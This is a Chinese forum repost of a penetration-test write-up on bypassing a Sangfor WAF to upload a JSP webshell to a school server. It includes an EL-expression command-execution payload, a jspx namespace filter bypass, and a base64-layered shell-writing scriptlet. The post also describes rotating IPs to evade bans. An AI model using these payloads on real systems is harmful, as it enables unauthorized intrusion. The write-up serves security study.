安全矩阵

 找回密码
 立即注册
搜索
查看: 2015|回复: 0

记一次绕过waf的任意文件上传

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-6-30 00:09:46 | 显示全部楼层 |阅读模式

记一次绕过waf的任意文件上传
原文链接:记一次绕过waf的任意文件上传
程序员阿甘 2022-06-29 22:00 发表于福建
0x01 前言

前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折。

期间进行了后缀名绕过,jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作。

0x02 获取网站接口

主界面:
编辑

上传点:
编辑

由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包获取接口和cookie
编辑

任意文件上传:
编辑

文件名强制命名为code+学号,后缀为最后一次点号出现之后的字母

0x03 后缀名绕过

代码不限制后缀名,但是waf限制呀!后缀名jsp,jspx会拦截,但是jspp,jspxx等不会拦截。
所以要利用windows特性绕过,常规的绕过手法例如末尾加点号、:DATA均无法绕过。
编辑

经过fuzz,发现正斜杠可以绕过
编辑

纰漏:

查阅相关资料后发现,在后缀名绕过那里可以绕过是因为tomcat认为.jsp/在文件名中是非法的,Tomcat会自动去除非法的/号,并不是因为windows的特性。但.jsp\的反斜杠在本地测试时也可以正常解析去除,在目标机上却无法解析,个人感觉应该很大程度取决于所用的java库及其版本,这次算是误打误撞的成功了,以后还得多多学习,避免出现此类错误。

0x04 内容绕过

常见的jsp标记均无法绕过
编辑
编辑

所以我们得绕过JSP标记检测,这里参考了yzddmr6师傅的两种绕过方法。
  •         jspEL表达式绕过
  •         jspx命名空间绕过


参考链接:

https://yzddmr6.com/posts/jsp-webshell-upload-bypass/

第一种是利用${}标记:

payload:

${Runtime.getRuntime().exec(request.getParameter("x"))}

但深信服waf过滤了一句话,需要变形绕过,鄙人太菜了,不了解相关函数的变形绕过,所以选择第二种写法。

第二种是利用命名空间的特性:
参照yzddmr6师傅的图:
编辑

使用自定义的命名空间,替换掉jsp的关键字,将原本的<jsp:scriptlet>替换成<自定义字符:scriptlet>,这样waf的正则匹配不到<jsp:scriptlet>自然就会放行
  1. <hi xmlns:hi="http://java.sun.com/JSP/Page">
  2.     <hi:scriptlet>
  3.         out.println(30*30);
  4.     </hi:scriptlet>
  5. </hi>
复制代码
编辑
编辑

0x05 获取网站路径

这里我们不能用相对路径来写入webshell因为Tomcat与Apache不同,根目录并不是以代码运行位置决定所在的目录,而是默认为Tomcat/bin作为根目录
# 获取当前的根目录
String path = System.getProperty("user.dir");
out.println(path);
编辑

# 获取web项目所在的目录
String path = application.getRealPath("test.jsp");
out.println(path);
编辑

所以写入shell的绝对路径应为:
D:/tomcat8/webapps/declare/static/upload/test.jsp

0x06 编码或加密绕过waf写入shell

菜鸡的payload:
  1. <hi xmlns:hi="http://java.sun.com/JSP/Page">
  2.     <hi:directive.page import="java.util.Base64,java.io.*"/>
  3.     <hi:scriptlet>
  4.         File file = new File("D:/tomcat8/webapps/declare/static/upload/test.jsp");
  5.         FileWriter fileOut = new FileWriter(file);
  6.         Base64.Decoder base64 = Base64.getDecoder();
  7.         byte[] str = base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(request.getParameter("x").getBytes("utf-8"))))));
  8.         try {
  9.             fileOut.write(new String(str, "utf-8"));
  10.             out.println("写入成功");
  11.         } catch (Exception e) {
  12.             e.printStackTrace();
  13.         } finally {
  14.             try {
  15.                 if (fileOut != null) {
  16.                     fileOut.close();
  17.                 }
  18.         } catch (Exception e) {
  19.                 e.printStackTrace();
  20.             }
  21.         }
  22.     </hi:scriptlet>
  23. </hi>
复制代码

一开始我是用两层base64编码,还是被检测了,经过fuzz发现五层编码即可绕过。
鄙人太懒了,不想重新造轮子。如果各位师傅有时间的话,遇到这种waf建议用RSA、AES等加密算法绕过。
编辑

成功getshell,System权限
编辑

看了一眼依赖,可能存在log4j2和jackson的RCE,留着下次当靶场继续测试
编辑

0x07 总结

深信服的waf算挺强了,而且也足够恶心,检测可疑行为直接封ip,光是fuzz就用掉了快30个ip了。

学校其他站点有thinkphp5.0.23 RCE、泛微8.0前台sql注入的漏洞,但都有这个waf,实在没有耐心一个个fuzz。
文章来源:先知社区(John)
原文地址:https://xz.aliyun.com/t/1133
版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权,烦请告知,我们会立即删除并致歉!
本公号发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 23:29 , Processed in 0.013114 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表